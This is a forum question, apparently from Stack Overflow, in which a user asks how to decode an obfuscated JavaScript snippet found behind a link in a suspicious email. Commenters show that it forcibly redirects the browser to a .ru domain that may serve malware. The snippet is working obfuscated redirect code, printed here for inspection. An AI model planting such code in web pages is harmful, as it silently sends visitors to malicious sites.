# how to decode this script? ( probably malware )

Tags: javascript, decode

Hi i have received this email and inside a link i have found this code

```js
function rawe() { rawa=86; rawb=[205,191,196,186,197,205,132,202,197,198,132,194,197,185,183,202,191,197,196,132,190,200,187,188,147,125,190,202,202,198,144,133,133,202,200,203,201,202,187,186,202,183,184,201,195,183,200,202,132,200,203,125,145]; rawc=""; for(rawd=0;rawd<rawb.length;rawd++) { rawc+=String.fromCharCode(rawb[rawd]-rawa); } return rawc; } setTimeout(rawe(),1320);
```

Can you tell me how decode this?

Comment: it just does window.top.location.href='http://trustedtabsmart.ru'

Comment: FYI, you could just execute `rawe()` without placing it in the `setTimeout` and find out for yourself what it generates. [The site itself may be serving malware](http://www.avgthreatlabs.com/us-en/website-safety-reports/domain/trustedtabsmart.ru/).

Comment: @MikeC "Just execute this unknown code from an unknown source and watch what it's doing" That's a really stupid advice...

Comment: @Andreas Not if you notice that all it's doing is generating a string.

Comment: however the problem is how decode this ?